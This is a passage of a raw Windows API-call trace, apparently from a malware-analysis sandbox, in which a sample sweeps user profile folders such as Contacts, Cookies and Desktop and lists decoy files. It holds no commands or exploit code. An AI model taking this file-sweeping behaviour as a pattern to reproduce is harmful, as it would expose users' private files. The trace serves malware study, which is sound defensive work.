ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.925] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b83cbe0, ftLastAccessTime.dwHighDateTime=0x1d5ff3c, ftLastWriteTime.dwLowDateTime=0x2b83cbe0, ftLastWriteTime.dwHighDateTime=0x1d5ff3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0209.925] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0209.925] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9d26360, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9d26360, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0209.925] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9d26360, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9d26360, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0209.925] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.925] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.925] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0209.926] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.926] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.926] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.926] PathFindFileNameW (pszPath="") returned="" [0209.926] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9d26360, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9d26360, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0209.926] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.926] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0209.926] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.926] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.926] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.926] PathFindFileNameW (pszPath="") returned="" [0209.926] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.927] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.927] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0209.927] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0209.927] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0209.927] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0209.927] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0209.927] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0209.927] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0209.927] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0209.927] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.927] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.927] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0209.927] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.927] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.927] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.927] PathFindFileNameW (pszPath="") returned="" [0209.928] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0209.928] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.928] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0209.928] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.928] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.928] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.928] PathFindFileNameW (pszPath="") returned="" [0209.928] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xbe74d9e0, ftLastAccessTime.dwHighDateTime=0x1d5ff3b, ftLastWriteTime.dwLowDateTime=0xbe74d9e0, ftLastWriteTime.dwHighDateTime=0x1d5ff3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.928] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xbe74d9e0, ftLastAccessTime.dwHighDateTime=0x1d5ff3b, ftLastWriteTime.dwLowDateTime=0xbe74d9e0, ftLastWriteTime.dwHighDateTime=0x1d5ff3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.928] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaabd8c80, ftCreationTime.dwHighDateTime=0x1d5ff3b, ftLastAccessTime.dwLowDateTime=0xaabd8c80, ftLastAccessTime.dwHighDateTime=0x1d5ff3b, ftLastWriteTime.dwLowDateTime=0xdc345900, ftLastWriteTime.dwHighDateTime=0x1d5ff37, nFileSizeHigh=0x0, nFileSizeLow=0xb1400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1A3E.TMP.EXE.exe", cAlternateFileName="1A3ETM~1.EXE")) returned 1 [0209.928] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77626480, ftCreationTime.dwHighDateTime=0x1d5da30, ftLastAccessTime.dwLowDateTime=0x2554c170, ftLastAccessTime.dwHighDateTime=0x1d5dfd4, ftLastWriteTime.dwLowDateTime=0x2554c170, ftLastWriteTime.dwHighDateTime=0x1d5dfd4, nFileSizeHigh=0x0, nFileSizeLow=0x7b4a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1hZIh39I2.jpg", cAlternateFileName="1HZIH3~1.JPG")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3cd68b0, ftCreationTime.dwHighDateTime=0x1d5e41a, ftLastAccessTime.dwLowDateTime=0xf6acb7c0, ftLastAccessTime.dwHighDateTime=0x1d5e5ea, ftLastWriteTime.dwLowDateTime=0xf6acb7c0, ftLastWriteTime.dwHighDateTime=0x1d5e5ea, nFileSizeHigh=0x0, nFileSizeLow=0xa72a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7_DS.odt", cAlternateFileName="")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c326ef0, ftCreationTime.dwHighDateTime=0x1d5e5e3, ftLastAccessTime.dwLowDateTime=0xb90a0680, ftLastAccessTime.dwHighDateTime=0x1d5db7b, ftLastWriteTime.dwLowDateTime=0xb90a0680, ftLastWriteTime.dwHighDateTime=0x1d5db7b, nFileSizeHigh=0x0, nFileSizeLow=0xaae2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9uB41.ods", cAlternateFileName="")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18edf30, ftCreationTime.dwHighDateTime=0x1d5e643, ftLastAccessTime.dwLowDateTime=0xaee8ff90, ftLastAccessTime.dwHighDateTime=0x1d5e264, ftLastWriteTime.dwLowDateTime=0xaee8ff90, ftLastWriteTime.dwHighDateTime=0x1d5e264, nFileSizeHigh=0x0, nFileSizeLow=0x15fd1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ALIa54IfVTUSG.csv", cAlternateFileName="ALIA54~1.CSV")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10203800, ftCreationTime.dwHighDateTime=0x1d5e247, ftLastAccessTime.dwLowDateTime=0xf0cdb270, ftLastAccessTime.dwHighDateTime=0x1d5e4df, ftLastWriteTime.dwLowDateTime=0xf0cdb270, ftLastWriteTime.dwHighDateTime=0x1d5e4df, nFileSizeHigh=0x0, nFileSizeLow=0x3e6d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C92L94lGKrwlxv4.gif", cAlternateFileName="C92L94~1.GIF")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dc179c0, ftCreationTime.dwHighDateTime=0x1d5e06d, ftLastAccessTime.dwLowDateTime=0x531b9e90, ftLastAccessTime.dwHighDateTime=0x1d5d82b, ftLastWriteTime.dwLowDateTime=0x531b9e90, ftLastWriteTime.dwHighDateTime=0x1d5d82b, nFileSizeHigh=0x0, nFileSizeLow=0x170af, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G0G1KclC.gif", cAlternateFileName="")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x600bb10, ftCreationTime.dwHighDateTime=0x1d5df95, ftLastAccessTime.dwLowDateTime=0x7d2629b0, ftLastAccessTime.dwHighDateTime=0x1d5dc38, ftLastWriteTime.dwLowDateTime=0x7d2629b0, ftLastWriteTime.dwHighDateTime=0x1d5dc38, nFileSizeHigh=0x0, nFileSizeLow=0xe07b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="g5opRQjJX413jOn 4aTe.doc", cAlternateFileName="G5OPRQ~1.DOC")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb599d3c0, ftCreationTime.dwHighDateTime=0x1d5e6a4, ftLastAccessTime.dwLowDateTime=0x88696b10, ftLastAccessTime.dwHighDateTime=0x1d5e1e8, ftLastWriteTime.dwLowDateTime=0x88696b10, ftLastWriteTime.dwHighDateTime=0x1d5e1e8, nFileSizeHigh=0x0, nFileSizeLow=0x51d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I0lC-Z.m4a", cAlternateFileName="")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x252bc420, ftCreationTime.dwHighDateTime=0x1d5e7c0, ftLastAccessTime.dwLowDateTime=0xbf702e50, ftLastAccessTime.dwHighDateTime=0x1d5dba3, ftLastWriteTime.dwLowDateTime=0xbf702e50, ftLastWriteTime.dwHighDateTime=0x1d5dba3, nFileSizeHigh=0x0, nFileSizeLow=0x590f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="inZlLm7e4IeFfAl.jpg", cAlternateFileName="INZLLM~1.JPG")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa45086f0, ftCreationTime.dwHighDateTime=0x1d5dc21, ftLastAccessTime.dwLowDateTime=0xc57a8cb0, ftLastAccessTime.dwHighDateTime=0x1d5e27d, ftLastWriteTime.dwLowDateTime=0xc57a8cb0, ftLastWriteTime.dwHighDateTime=0x1d5e27d, nFileSizeHigh=0x0, nFileSizeLow=0x10c08, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IufxORE9Ig.gif", cAlternateFileName="IUFXOR~1.GIF")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb67bf460, ftCreationTime.dwHighDateTime=0x1d5e1d8, ftLastAccessTime.dwLowDateTime=0x601de800, ftLastAccessTime.dwHighDateTime=0x1d5df2e, ftLastWriteTime.dwLowDateTime=0x601de800, ftLastWriteTime.dwHighDateTime=0x1d5df2e, nFileSizeHigh=0x0, nFileSizeLow=0x12523, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kHW_C.wav", cAlternateFileName="")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe5ef740, ftCreationTime.dwHighDateTime=0x1d5d9f4, ftLastAccessTime.dwLowDateTime=0x1821a480, ftLastAccessTime.dwHighDateTime=0x1d5e157, ftLastWriteTime.dwLowDateTime=0x1821a480, ftLastWriteTime.dwHighDateTime=0x1d5e157, nFileSizeHigh=0x0, nFileSizeLow=0x15c9c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mBKyb79uIbJvVDPK.png", cAlternateFileName="MBKYB7~1.PNG")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e70e460, ftCreationTime.dwHighDateTime=0x1d5e6e1, ftLastAccessTime.dwLowDateTime=0x61bfe9a0, ftLastAccessTime.dwHighDateTime=0x1d5d917, ftLastWriteTime.dwLowDateTime=0x61bfe9a0, ftLastWriteTime.dwHighDateTime=0x1d5d917, nFileSizeHigh=0x0, nFileSizeLow=0x156bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mL4ugr.m4a", cAlternateFileName="")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x577bc8b0, ftCreationTime.dwHighDateTime=0x1d5e7b3, ftLastAccessTime.dwLowDateTime=0x33846820, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x33846820, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x2bb9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mM8UwaBzXlnz.swf", cAlternateFileName="MM8UWA~1.SWF")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99640a00, ftCreationTime.dwHighDateTime=0x1d5dfe6, ftLastAccessTime.dwLowDateTime=0x33d261a0, ftLastAccessTime.dwHighDateTime=0x1d5e716, ftLastWriteTime.dwLowDateTime=0x33d261a0, ftLastWriteTime.dwHighDateTime=0x1d5e716, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MpV84iMo", cAlternateFileName="")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a30df0, ftCreationTime.dwHighDateTime=0x1d5e45a, ftLastAccessTime.dwLowDateTime=0xc84fc690, ftLastAccessTime.dwHighDateTime=0x1d5e50b, ftLastWriteTime.dwLowDateTime=0xc84fc690, ftLastWriteTime.dwHighDateTime=0x1d5e50b, nFileSizeHigh=0x0, nFileSizeLow=0xc90f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OKUWlfXXOAa.jpg", cAlternateFileName="OKUWLF~1.JPG")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8036a870, ftCreationTime.dwHighDateTime=0x1d5db50, ftLastAccessTime.dwLowDateTime=0x3e640140, ftLastAccessTime.dwHighDateTime=0x1d5e0c8, ftLastWriteTime.dwLowDateTime=0x3e640140, ftLastWriteTime.dwHighDateTime=0x1d5e0c8, nFileSizeHigh=0x0, nFileSizeLow=0x78ef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pQ_BEWt9108efGO tJz_.flv", cAlternateFileName="PQ_BEW~1.FLV")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9328e5e0, ftCreationTime.dwHighDateTime=0x1d5d7d3, ftLastAccessTime.dwLowDateTime=0xc6efde40, ftLastAccessTime.dwHighDateTime=0x1d5e554, ftLastWriteTime.dwLowDateTime=0xc6efde40, ftLastWriteTime.dwHighDateTime=0x1d5e554, nFileSizeHigh=0x0, nFileSizeLow=0xf8d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pSbgO3wofHbNFLgP8QZ.png", cAlternateFileName="PSBGO3~1.PNG")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41872e20, ftCreationTime.dwHighDateTime=0x1d5e2d4, ftLastAccessTime.dwLowDateTime=0xbbddcc60, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xbbddcc60, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x14c0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pu N.wav", cAlternateFileName="PUN~1.WAV")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc473a700, ftCreationTime.dwHighDateTime=0x1d5e73e, ftLastAccessTime.dwLowDateTime=0x21a54290, ftLastAccessTime.dwHighDateTime=0x1d5de56, ftLastWriteTime.dwLowDateTime=0x21a54290, ftLastWriteTime.dwHighDateTime=0x1d5de56, nFileSizeHigh=0x0, nFileSizeLow=0x7509, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Qmx9sV04.gif", cAlternateFileName="")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, 